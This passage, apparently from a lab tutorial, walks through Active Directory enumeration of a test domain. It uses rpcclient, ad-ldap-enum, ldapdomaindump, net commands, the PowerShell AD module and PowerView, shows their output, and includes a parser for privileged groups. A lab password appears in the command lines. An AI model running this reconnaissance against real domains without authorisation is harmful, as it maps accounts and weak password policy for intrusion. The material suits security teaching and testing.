User rid: 0x1f7
User data : 
        User Name   :   DefaultAccount
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta de usuario administrada por el sistema.
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      jue, 01 ene 1970 01:00:00 CET
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      jue, 01 ene 1970 01:00:00 CET
        Password can change Time :      jue, 01 ene 1970 01:00:00 CET
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x1f7
        group_rid:      0x201
        acb_info :      0x00000215
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
User rid: 0x452
User data : 
        User Name   :   worker1
        Full Name   :   trabajador1
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      dom, 12 sep 2021 19:57:13 CEST
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      dom, 12 sep 2021 13:14:04 CEST
        Password can change Time :      lun, 13 sep 2021 13:14:04 CEST
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x452
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000009
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
User rid: 0x453
User data : 
        User Name   :   worker2
        Full Name   :   trabajador2
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      sáb, 18 sep 2021 20:33:46 CEST
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      dom, 12 sep 2021 13:14:39 CEST
        Password can change Time :      lun, 13 sep 2021 13:14:39 CEST
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x453
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000004b
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
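The loop output above is long, and the facts a reviewer wants are buried in it: who is in the built-in admin groups and which accounts are disabled. The script below is an added example, not part of the original post: it parses that dump format into a user-to-groups map, then reports members of the well-known privileged RIDs 0x200, 0x206, 0x207 and 0x208 and the accounts whose acb_info has the SAMR disabled bit (0x0001) set. The embedded input is a trimmed excerpt constructed from the output above; the RID and bit values are the standard ones.

```python
import re

# Well-known RIDs of the built-in privileged groups (see the querygroup output above).
PRIVILEGED_RIDS = {
    "0x200": "Domain Admins",
    "0x206": "Schema Admins",
    "0x207": "Enterprise Admins",
    "0x208": "Group Policy Creator Owners",
}
ACB_DISABLED = 0x0001   # SAMR acb_info bit as printed by queryuser

# Constructed, trimmed excerpt in the layout of the loop output above.
SAMPLE_REPORT = """\
User rid: 0x1f4
User data : 
        User Name   :   Administrador
        Description :   Cuenta integrada para la administración del equipo o dominio
        user_rid :      0x1f4
        group_rid:      0x201
        acb_info :      0x00000210
 User groups: 
        group rid:[0x200] attr:[0x7]
        group rid:[0x201] attr:[0x7]
0x200
        Group Name:     Admins. del dominio
        Num Members:1
0x201
        Group Name:     Usuarios del dominio
        Num Members:5
User rid: 0x1f5
User data : 
        User Name   :   Invitado
        acb_info :      0x00000215
 User groups: 
        group rid:[0x202] attr:[0x7]
0x202
        Group Name:     Invitados del dominio
        Num Members:1
User rid: 0x452
User data : 
        User Name   :   worker1
        acb_info :      0x00000210
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Num Members:5
"""


def parse_report(text: str) -> dict:
    """Parse the users-memberof-groups dump into {user_rid: {name, acb_info, groups{rid: name}}}."""
    users, current, pending_group = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := re.match(r"User rid: (0x[0-9a-f]+)$", line):
            current = users.setdefault(m.group(1), {"name": None, "acb_info": 0, "groups": {}})
            pending_group = None
        elif current is None:
            continue
        elif m := re.match(r"User Name\s*:\s*(.*)", line):
            current["name"] = m.group(1).strip()
        elif m := re.match(r"acb_info\s*:\s*(0x[0-9a-f]+)", line):
            current["acb_info"] = int(m.group(1), 16)
        elif m := re.match(r"group rid:\[(0x[0-9a-f]+)\]", line):   # queryusergroups line
            current["groups"].setdefault(m.group(1), None)
        elif re.fullmatch(r"0x[0-9a-f]+", line):                     # the "echo $j" before querygroup
            pending_group = line
        elif pending_group and (m := re.match(r"Group Name:\s*(.*)", line)):
            current["groups"][pending_group] = m.group(1).strip()
            pending_group = None
    return users


def privileged_members(users: dict) -> list:
    """(user name, [privileged group names]) for every account in a built-in admin group."""
    out = []
    for _, u in sorted(users.items()):
        hits = [u["groups"].get(g) or PRIVILEGED_RIDS[g] for g in u["groups"] if g in PRIVILEGED_RIDS]
        if hits:
            out.append((u["name"], hits))
    return out


def disabled_accounts(users: dict) -> list:
    return [u["name"] for _, u in sorted(users.items()) if u["acb_info"] & ACB_DISABLED]


if __name__ == "__main__":
    users = parse_report(SAMPLE_REPORT)
    for name, groups in privileged_members(users):
        print(f"privileged: {name} -> {', '.join(groups)}")
    print("disabled:", ", ".join(disabled_accounts(users)))
```

Keying the report on RIDs rather than on the localized group names is what makes it portable: "Admins. del dominio" here is RID 0x200 everywhere, so the same check works on an English or Spanish domain.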


1.2 ad-ldap-enum

Follow the tool installation from GitHub: https://github.com/CroweCybersecurity/ad-ldap-enum

Tool execution against the domain:

kali@kali:/opt/ad-ldap-enum$ python ad-ldap-enum.py  -l 10.0.2.17 -d CORPORATIVE.DOMAIN.local -u worker2 -p Passw0rd1
2021-09-18 21:02:39 INFO     Querying users
2021-09-18 21:02:39 INFO     Querying groups
2021-09-18 21:02:39 INFO     Querying computers
2021-09-18 21:02:39 INFO     Building users dictionary
2021-09-18 21:02:39 INFO     Building groups dictionary
2021-09-18 21:02:39 INFO     Building computers dictionary
2021-09-18 21:02:39 INFO     Exploding large groups
2021-09-18 21:02:39 INFO     Building group membership
2021-09-18 21:02:39 INFO     There is a total of [50] groups
2021-09-18 21:02:39 INFO     Elapsed Time [0:00:00.028534]


1.3 ldapdomaindump

I include this tool because it produces one of the best enumeration outputs I've ever seen:

Tool execution process:

ldapdomaindump -u "CORPORATIVE\worker2" -p Passw0rd1  10.0.2.17
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Launching a local python3 http server:

kali@kali:/tmp$ python3 -m http.server 8989
Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...
127.0.0.1 - - [18/Sep/2021 21:11:50] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:11:55] "GET /domain_computers.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:11:58] "GET /domain_computers_by_os.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:11:59] "GET /domain_groups.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:12:01] "GET /domain_policy.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:12:01] code 404, message File not found
127.0.0.1 - - [18/Sep/2021 21:12:01] "GET /favicon.ico HTTP/1.1" 404 -
----------------------------------------

Access the HTML content from your browser:


Domain computers by operating system:

Domain groups:



Domain policy:


Domain users:




Domain groups:




Domain computer accounts:

2. INSIDE OF DOMAIN

In this part of the enumeration we perform reconnaissance of the domain controller from inside the corporate domain, using the tools available on a Windows 10 client computer:

2.1 Windows CMD enumeration commands


Domain users:

 

C:\Users\worker2>net users /domain
Se procesará la solicitud en un controlador de dominio del dominio CORPORATIVE.DOMAIN.local.


Cuentas de usuario de \\CORPORATIVE-DOMAIN.CORPORATIVE.DOMAIN.local

-------------------------------------------------------------------------------
Administrador            DefaultAccount           Invitado
krbtgt                   worker1                  worker2
Se ha completado el comando correctamente.

Domain groups:

C:\Users\worker2>net groups /domain
Se procesará la solicitud en un controlador de dominio del dominio CORPORATIVE.DOMAIN.local.


Cuentas de grupo de \\CORPORATIVE-DOMAIN.CORPORATIVE.DOMAIN.local

-------------------------------------------------------------------------------
*Administradores clave
*Administradores clave de la organización
*Administradores de empresas
*Administradores de esquema
*Admins. del dominio
*Controladores de dominio
*Controladores de dominio clonables
*Controladores de dominio de sólo lectura
*DnsUpdateProxy
*Enterprise Domain Controllers de sólo lectura
*Equipos del dominio
*Invitados del dominio
*Propietarios del creador de directivas de grupo
*Protected Users
*RDP
*Usuarios del dominio
Se ha completado el comando correctamente.

Groups membership:

C:\Users\worker2>net group "Usuarios del dominio" /domain
Se procesará la solicitud en un controlador de dominio del dominio CORPORATIVE.DOMAIN.local.

Nombre de grupo     Usuarios del dominio
Comentario          Todos los usuarios del dominio

Miembros

-------------------------------------------------------------------------------
Administrador            DefaultAccount           krbtgt
worker1                  worker2
Se ha completado el comando correctamente.


Using wmic for domain enumeration:




Using wmic for domain groups enumeration:




2.2 PowerShell: Active Directory module:


All supported functions:

PS C:\Users\worker2\Documents> Get-command -Module activedirectory

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Add-ADCentralAccessPolicyMember                    1.0.0.0    ActiveDirectory
Cmdlet          Add-ADComputerServiceAccount                       1.0.0.0    ActiveDirectory
Cmdlet          Add-ADDomainControllerPasswordReplicationPolicy    1.0.0.0    ActiveDirectory
Cmdlet          Add-ADFineGrainedPasswordPolicySubject             1.0.0.0    ActiveDirectory
Cmdlet          Add-ADGroupMember                                  1.0.0.0    ActiveDirectory
Cmdlet          Add-ADPrincipalGroupMembership                     1.0.0.0    ActiveDirectory
Cmdlet          Add-ADResourcePropertyListMember                   1.0.0.0    ActiveDirectory
Cmdlet          Clear-ADAccountExpiration                          1.0.0.0    ActiveDirectory
Cmdlet          Clear-ADClaimTransformLink                         1.0.0.0    ActiveDirectory
Cmdlet          Disable-ADAccount                                  1.0.0.0    ActiveDirectory
Cmdlet          Disable-ADOptionalFeature                          1.0.0.0    ActiveDirectory
Cmdlet          Enable-ADAccount                                   1.0.0.0    ActiveDirectory
Cmdlet          Enable-ADOptionalFeature                           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAccountAuthorizationGroup                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAccountResultantPasswordReplicationPolicy    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAuthenticationPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAuthenticationPolicySilo                     1.0.0.0    ActiveDirectory
Cmdlet          Get-ADCentralAccessPolicy                          1.0.0.0    ActiveDirectory
Cmdlet          Get-ADCentralAccessRule                            1.0.0.0    ActiveDirectory
Cmdlet          Get-ADClaimTransformPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADClaimType                                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADComputer                                     1.0.0.0    ActiveDirectory
Cmdlet          Get-ADComputerServiceAccount                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDCCloningExcludedApplicationList             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDefaultDomainPasswordPolicy                  1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomain                                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomainController                             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomainControllerPasswordReplicationPolicy    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomainControllerPasswordReplicationPolicy... 1.0.0.0    ActiveDirectory
Cmdlet          Get-ADFineGrainedPasswordPolicy                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADFineGrainedPasswordPolicySubject             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADForest                                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADGroup                                        1.0.0.0    ActiveDirectory
Cmdlet          Get-ADGroupMember                                  1.0.0.0    ActiveDirectory
Cmdlet          Get-ADObject                                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADOptionalFeature                              1.0.0.0    ActiveDirectory
Cmdlet          Get-ADOrganizationalUnit                           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADPrincipalGroupMembership                     1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationAttributeMetadata                 1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationConnection                        1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationFailure                           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationPartnerMetadata                   1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationQueueOperation                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSite                              1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSiteLink                          1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSiteLinkBridge                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSubnet                            1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationUpToDatenessVectorTable           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADResourceProperty                             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADResourcePropertyList                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADResourcePropertyValueType                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADRootDSE                                      1.0.0.0    ActiveDirectory
Cmdlet          Get-ADServiceAccount                               1.0.0.0    ActiveDirectory
Cmdlet          Get-ADTrust                                        1.0.0.0    ActiveDirectory
Cmdlet          Get-ADUser                                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADUserResultantPasswordPolicy                  1.0.0.0    ActiveDirectory
Cmdlet          Grant-ADAuthenticationPolicySiloAccess             1.0.0.0    ActiveDirectory
Cmdlet          Install-ADServiceAccount                           1.0.0.0    ActiveDirectory
Cmdlet          Move-ADDirectoryServer                             1.0.0.0    ActiveDirectory
Cmdlet          Move-ADDirectoryServerOperationMasterRole          1.0.0.0    ActiveDirectory
Cmdlet          Move-ADObject                                      1.0.0.0    ActiveDirectory
Cmdlet          New-ADAuthenticationPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          New-ADAuthenticationPolicySilo                     1.0.0.0    ActiveDirectory
Cmdlet          New-ADCentralAccessPolicy                          1.0.0.0    ActiveDirectory
Cmdlet          New-ADCentralAccessRule                            1.0.0.0    ActiveDirectory
Cmdlet          New-ADClaimTransformPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          New-ADClaimType                                    1.0.0.0    ActiveDirectory
Cmdlet          New-ADComputer                                     1.0.0.0    ActiveDirectory
Cmdlet          New-ADDCCloneConfigFile                            1.0.0.0    ActiveDirectory
Cmdlet          New-ADFineGrainedPasswordPolicy                    1.0.0.0    ActiveDirectory
Cmdlet          New-ADGroup                                        1.0.0.0    ActiveDirectory
Cmdlet          New-ADObject                                       1.0.0.0    ActiveDirectory
Cmdlet          New-ADOrganizationalUnit                           1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSite                              1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSiteLink                          1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSiteLinkBridge                    1.0.0.0    ActiveDirectory
Cmdlet          New-ADReplicationSubnet                            1.0.0.0    ActiveDirectory
Cmdlet          New-ADResourceProperty                             1.0.0.0    ActiveDirectory
Cmdlet          New-ADResourcePropertyList                         1.0.0.0    ActiveDirectory
Cmdlet          New-ADServiceAccount                               1.0.0.0    ActiveDirectory
Cmdlet          New-ADUser                                         1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADAuthenticationPolicy                      1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADAuthenticationPolicySilo                  1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADCentralAccessPolicy                       1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADCentralAccessPolicyMember                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADCentralAccessRule                         1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADClaimTransformPolicy                      1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADClaimType                                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADComputer                                  1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADComputerServiceAccount                    1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADDomainControllerPasswordReplicationPolicy 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADFineGrainedPasswordPolicy                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADFineGrainedPasswordPolicySubject          1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADGroup                                     1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADGroupMember                               1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADObject                                    1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADOrganizationalUnit                        1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADPrincipalGroupMembership                  1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSite                           1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSiteLink                       1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSiteLinkBridge                 1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADReplicationSubnet                         1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADResourceProperty                          1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADResourcePropertyList                      1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADResourcePropertyListMember                1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADServiceAccount                            1.0.0.0    ActiveDirectory
Cmdlet          Remove-ADUser                                      1.0.0.0    ActiveDirectory
Cmdlet          Rename-ADObject                                    1.0.0.0    ActiveDirectory
Cmdlet          Reset-ADServiceAccountPassword                     1.0.0.0    ActiveDirectory
Cmdlet          Restore-ADObject                                   1.0.0.0    ActiveDirectory
Cmdlet          Revoke-ADAuthenticationPolicySiloAccess            1.0.0.0    ActiveDirectory
Cmdlet          Search-ADAccount                                   1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountAuthenticationPolicySilo              1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountControl                               1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountExpiration                            1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAccountPassword                              1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAuthenticationPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Set-ADAuthenticationPolicySilo                     1.0.0.0    ActiveDirectory
Cmdlet          Set-ADCentralAccessPolicy                          1.0.0.0    ActiveDirectory
Cmdlet          Set-ADCentralAccessRule                            1.0.0.0    ActiveDirectory
Cmdlet          Set-ADClaimTransformLink                           1.0.0.0    ActiveDirectory
Cmdlet          Set-ADClaimTransformPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Set-ADClaimType                                    1.0.0.0    ActiveDirectory
Cmdlet          Set-ADComputer                                     1.0.0.0    ActiveDirectory
Cmdlet          Set-ADDefaultDomainPasswordPolicy                  1.0.0.0    ActiveDirectory
Cmdlet          Set-ADDomain                                       1.0.0.0    ActiveDirectory
Cmdlet          Set-ADDomainMode                                   1.0.0.0    ActiveDirectory
Cmdlet          Set-ADFineGrainedPasswordPolicy                    1.0.0.0    ActiveDirectory
Cmdlet          Set-ADForest                                       1.0.0.0    ActiveDirectory
Cmdlet          Set-ADForestMode                                   1.0.0.0    ActiveDirectory
Cmdlet          Set-ADGroup                                        1.0.0.0    ActiveDirectory
Cmdlet          Set-ADObject                                       1.0.0.0    ActiveDirectory
Cmdlet          Set-ADOrganizationalUnit                           1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationConnection                        1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSite                              1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSiteLink                          1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSiteLinkBridge                    1.0.0.0    ActiveDirectory
Cmdlet          Set-ADReplicationSubnet                            1.0.0.0    ActiveDirectory
Cmdlet          Set-ADResourceProperty                             1.0.0.0    ActiveDirectory
Cmdlet          Set-ADResourcePropertyList                         1.0.0.0    ActiveDirectory
Cmdlet          Set-ADServiceAccount                               1.0.0.0    ActiveDirectory
Cmdlet          Set-ADUser                                         1.0.0.0    ActiveDirectory
Cmdlet          Show-ADAuthenticationPolicyExpression              1.0.0.0    ActiveDirectory
Cmdlet          Sync-ADObject                                      1.0.0.0    ActiveDirectory
Cmdlet          Test-ADServiceAccount                              1.0.0.0    ActiveDirectory
Cmdlet          Uninstall-ADServiceAccount                         1.0.0.0    ActiveDirectory
Cmdlet          Unlock-ADAccount                                   1.0.0.0    ActiveDirectory

Execution examples:
    - Get domain users:

PS C:\Users\worker2\Documents> Get-ADUser

cmdlet Get-ADUser en la posición 1 de la canalización de comandos
Proporcione valores para los parámetros siguientes:
(Escriba !? para obtener Ayuda).
Filter: *


DistinguishedName : CN=Administrador,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : True
GivenName         :
Name              : Administrador
ObjectClass       : user
ObjectGUID        : fac68faf-e080-4edc-8c0d-e9074b6b245e
SamAccountName    : Administrador
SID               : S-1-5-21-2048228633-4105951457-1013245227-500
Surname           :
UserPrincipalName :

DistinguishedName : CN=Invitado,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : False
GivenName         :
Name              : Invitado
ObjectClass       : user
ObjectGUID        : e97cfc2c-0d03-47e6-8da7-9196cb028e2f
SamAccountName    : Invitado
SID               : S-1-5-21-2048228633-4105951457-1013245227-501
Surname           :
UserPrincipalName :

DistinguishedName : CN=DefaultAccount,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : False
GivenName         :
Name              : DefaultAccount
ObjectClass       : user
ObjectGUID        : 34b807f2-66a4-47cd-b140-20f32341c678
SamAccountName    : DefaultAccount
SID               : S-1-5-21-2048228633-4105951457-1013245227-503
Surname           :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : False
GivenName         :
Name              : krbtgt
ObjectClass       : user
ObjectGUID        : 32daa5cd-711e-4054-9dba-e718739a7c0f
SamAccountName    : krbtgt
SID               : S-1-5-21-2048228633-4105951457-1013245227-502
Surname           :
UserPrincipalName :

DistinguishedName : CN=trabajador1,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : True
GivenName         : trabajador1
Name              : trabajador1
ObjectClass       : user
ObjectGUID        : 1c1959f2-3042-48a0-8127-2266b90fc647
SamAccountName    : worker1
SID               : S-1-5-21-2048228633-4105951457-1013245227-1106
Surname           :
UserPrincipalName : worker1@CORPORATIVE.DOMAIN.local

DistinguishedName : CN=trabajador2,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local
Enabled           : True
GivenName         : trabajador2
Name              : trabajador2
ObjectClass       : user
ObjectGUID        : 29a63c66-b44a-48cf-93bc-b1acdd9ca77a
SamAccountName    : worker2
SID               : S-1-5-21-2048228633-4105951457-1013245227-1107
Surname           :
UserPrincipalName : worker2@CORPORATIVE.DOMAIN.local


    - Obtaining domain groups:

PS C:\Users\worker2\Documents> Get-ADGroup

cmdlet Get-ADGroup en la posición 1 de la canalización de comandos
Proporcione valores para los parámetros siguientes:
(Escriba !? para obtener Ayuda).
Filter: *


DistinguishedName : CN=Administradores,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Administradores
ObjectClass       : group
ObjectGUID        : b8cbfc78-0068-4e59-8de0-bd29995f88f2
SamAccountName    : Administradores
SID               : S-1-5-32-544

DistinguishedName : CN=Usuarios,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Usuarios
ObjectClass       : group
ObjectGUID        : b4da0565-18ab-405c-8236-052cc188f9cd
SamAccountName    : Usuarios
SID               : S-1-5-32-545

DistinguishedName : CN=Invitados,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Invitados
ObjectClass       : group
ObjectGUID        : 4ff00d11-fd45-418e-833f-ce1775122be3
SamAccountName    : Invitados
SID               : S-1-5-32-546

DistinguishedName : CN=Opers. de impresión,CN=Builtin,DC=CORPORATIVE,DC=DOMAIN,DC=local
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Opers. de impresión
ObjectClass       : group
ObjectGUID        : f0082985-9e5b-4968-9517-7007bc0048eb
SamAccountName    : Opers. de impresión
SID               : S-1-5-32-550

.....
etc.


    - Obtaining domain computers:

PS C:\Users\worker2\Documents> Get-ADComputer

cmdlet Get-ADComputer en la posición 1 de la canalización de comandos
Proporcione valores para los parámetros siguientes:
(Escriba !? para obtener Ayuda).
Filter: *

DistinguishedName : CN=CORPORATIVE-DOM,OU=Domain Controllers,DC=CORPORATIVE,DC=DOMAIN,DC=local
DNSHostName       : CORPORATIVE-DOMAIN.CORPORATIVE.DOMAIN.local
Enabled           : True
Name              : CORPORATIVE-DOM
ObjectClass       : computer
ObjectGUID        : cda5f480-f490-4cbf-bf0f-354e232a603d
SamAccountName    : CORPORATIVE-DOM$
SID               : S-1-5-21-2048228633-4105951457-1013245227-1000
UserPrincipalName :

DistinguishedName : CN=WKS-002,CN=Computers,DC=CORPORATIVE,DC=DOMAIN,DC=local
DNSHostName       : WKS-002.CORPORATIVE.DOMAIN.local
Enabled           : True
Name              : WKS-002
ObjectClass       : computer
ObjectGUID        : fb8e2755-be32-43bd-90e1-3c259e1df104
SamAccountName    : WKS-002$
SID               : S-1-5-21-2048228633-4105951457-1013245227-1103
UserPrincipalName :

DistinguishedName : CN=WKS-001,CN=Computers,DC=CORPORATIVE,DC=DOMAIN,DC=local
DNSHostName       : WKS-001.CORPORATIVE.DOMAIN.local
Enabled           : True
Name              : WKS-001
ObjectClass       : computer
ObjectGUID        : e5c3910e-a9f2-403d-922a-35d41451308f
SamAccountName    : WKS-001$
SID               : S-1-5-21-2048228633-4105951457-1013245227-1104
UserPrincipalName :

    - Obtaining the default domain password policy:

PS C:\Users\worker2\Documents> Get-ADDefaultDomainPasswordPolicy


ComplexityEnabled           : True
DistinguishedName           : DC=CORPORATIVE,DC=DOMAIN,DC=local
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 7
objectClass                 : {domainDNS}
objectGuid                  : 2628752b-488d-4d56-83c1-6a3088415297
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False



2.3 Powershell: Powerview Module

Interesting functions for enumeration:

Domain/LDAP Functions:

Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain
Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone
Get-Domain                      -   returns the domain object for the current (or specified) domain
Get-DomainController            -   return the domain controllers for the current (or specified) domain
Get-Forest                      -   returns the forest object for the current (or specified) forest
Get-ForestDomain                -   return all domains for the current (or specified) forest
Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest
Find-DomainObjectPropertyOutlier -  finds user/group/computer objects in AD that have 'outlier' properties set
Get-DomainUser                  -   return all users or specific user objects in AD
New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object
Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events
Get-DomainComputer              -   returns all computers or specific computer objects in AD
Get-DomainObject                -   returns all (or specified) domain objects in AD
Set-DomainObject                -   modifies a given property for a specified active directory object
Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object
Add-DomainObjectAcl             -   adds an ACL for a specific active directory object
Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects
Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD
Get-DomainSite                  -   search for all sites or specific site objects in AD
Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD
Get-DomainSID                   -   returns the SID for the current domain or the specified domain
Get-DomainGroup                 -   return all groups or specific group objects in AD
New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object
Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set
Get-DomainGroupMember           -   return the members of a specific domain group
Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so
Get-DomainFileServer            -   returns a list of servers likely functioning as file servers
Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain

GPO functions

Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD
Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences
